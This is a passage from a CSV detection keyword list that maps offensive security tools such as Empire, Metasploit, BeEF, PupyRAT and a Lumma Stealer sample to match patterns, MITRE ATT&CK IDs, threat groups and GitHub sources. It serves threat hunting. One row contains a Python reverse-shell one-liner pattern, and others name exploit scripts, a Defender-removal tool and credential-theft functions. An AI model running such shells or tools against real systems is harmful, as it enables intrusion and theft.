T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - 
T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43576" "*Exploitation Toolkit*",".{0,1000}Exploitation\sToolkit.{0,1000}","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. 
PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/RUB-NDS/PRT","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43578" "*exploit-database-bin-sploits/*",".{0,1000}exploit\-database\-bin\-sploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","43579" "*Exploit-EternalBlue.ps1*",".{0,1000}Exploit\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - 
Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43580" "*ExploitGuard_d.reg*",".{0,1000}ExploitGuard_d\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43581" "*Exploit-JBoss -*",".{0,1000}Exploit\-JBoss\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43582" "*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43583" "*Exploit-Jenkins*",".{0,1000}Exploit\-Jenkins.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-Jenkins.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43584" "*Exploit-Jenkins.ps1*",".{0,1000}Exploit\-Jenkins\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43585" "*Exploit-JMXConsole*",".{0,1000}Exploit\-JMXConsole.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43586" "*exploits*_csrf/*.js*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43587" "*exploits*_csrf/*.rb*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43588" "*exploits/*_macro*",".{0,1000}exploits\/.{0,1000}_macro.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43589" "*exploits/CVE-*",".{0,1000}exploits\/CVE\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43590" "*exploits-forsale/prefetch-tool*",".{0,1000}exploits\-forsale\/prefetch\-tool.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","43591" "*exploit-suggester*",".{0,1000}exploit\-suggester.{0,1000}","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. 
It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","N/A","10","4055","1036","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z","43592" "*ExploitTest.cpp*",".{0,1000}ExploitTest\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","43593" "*ExploitTest.vcxproj*",".{0,1000}ExploitTest\.vcxproj.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","43594" "*explorer /root,c:\windows\system32\sdclt.exe*",".{0,1000}explorer\s\/root,c\:\\windows\\system32\\sdclt\.exe.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43595" "*export KRB5CCNAME=*.ccache*",".{0,1000}export\sKRB5CCNAME\=.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","43603" 
"*export KRB5CCNAME=/*/impacket/administrator.ccache* ",".{0,1000}export\sKRB5CCNAME\=\/.{0,1000}\/impacket\/administrator\.ccache.{0,1000}\s","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43604" "*export NEMESIS_BASE_URL*",".{0,1000}export\sNEMESIS_BASE_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","43605" "*export NEMESIS_CREDS*",".{0,1000}export\sNEMESIS_CREDS.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","43606" "*export RESOCKS_KEY=*",".{0,1000}export\sRESOCKS_KEY\=.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","43607" "*export RHOST=*export RPORT=*python3 
-c*socket.socket()*connect*os.getenv(""RHOST"")*pty.spawn(""sh"")*",".{0,1000}export\sRHOST\=.{0,1000}export\sRPORT\=.{0,1000}python3\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}os\.getenv\(\""RHOST\""\).{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","43608" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - 
Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","43622" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43623" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43624" "*exports --dll *.dll --prototypes ./Assets/prototypes.csv*",".{0,1000}exports\s\-\-dll\s.{0,1000}\.dll\s\-\-prototypes\s\.\/Assets\/prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","#linux","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","43625" "*exposed_get_password*",".{0,1000}exposed_get_password.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43628" "*exrienz/DirtyCow*",".{0,1000}exrienz\/DirtyCow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","43629" "*Extedx765ensioedx765ns/*",".{0,1000}Extedx765ensioedx765ns\/.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43630" "*extensions/sniffer*",".{0,1000}extensions\/sniffer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
